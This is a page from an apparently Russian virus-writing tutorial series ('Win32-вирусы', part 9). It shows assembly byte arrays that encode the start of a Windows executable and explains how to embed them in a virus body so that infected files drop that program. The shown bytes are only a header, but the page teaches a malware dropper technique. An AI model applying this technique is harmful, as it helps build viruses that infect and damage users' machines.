_fileDAT_0 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
_fileDAT_1 db 77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0
_fileDAT_2 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 176, 0, 0, 0
_fileDAT_3 db 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111
_fileDAT_4 db 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0
_fileDAT_5 db 93, 101, 253, 200, 25, 4, 147, 155, 25, 4, 147, 155, 25, 4, 147, 155, 151, 27, 128, 155, 17, 4, 147, 155, 229, 36, 129, 155, 24, 4, 147, 155
_fileDAT_6 db 82, 105, 99, 104, 25, 4, 147, 155, 0, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 34, 94, 113, 64, 0, 0, 0, 0
_fileDAT_7 db 0, 0, 0, 0, 224, 0, 15, 1, 11, 1, 5, 12, 0, 2, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0
_fileDAT_8 db 0, 32, 0, 0, 0, 0, 64, 0, 0, 16, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0
_fileDAT_9 db 0, 64, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0
_fileDAT_10 db 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 32, 0, 0, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
_fileDAT_13 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
_fileDAT_14 db …

как видно строки по номерам идут не по порядку. Вносить же в тело программы строки нужно строго по порядку. Проделывая эту работу, Вы увидите сколько пустого места хранится в обыкновенной exe – шке. Это, я думаю, познавательно : )
Из файла f_to_dw.txt , путем складывания последних цифр каждой строки, можно узнать объем нашей exe- младенца.
Итак наша программа теперь может оплодотворить, и “жертва” может “родить”. В следующей статье мы рассмотрим полный (но все таки подчищенный для учебных целей) исходник. До свиданья.

Перечень используемого программного обеспечения:
[1.1] - file2sc.exe - программа формирования исходников из файла (http://www.danil.com.ua)

[C] _follower / TPOC

Дата последнего обновления: 4 августа 2005 года

У вас есть предложения по нашему сайту?
Напишите сюда

Любимые сайты вирмейкеров:
(WASM) (RSDN)

"Win32-вирусы"
9. Способность «породить» нечто полезное

Наши новости

Статьи

Программы

Релизы

Ссылки

Наша лаборатория

"Win32-вирусы" 9. Способность «породить» нечто полезное

Наши новости

Статьи

Программы

Релизы

Ссылки

Наша лаборатория

"Win32-вирусы"
9. Способность «породить» нечто полезное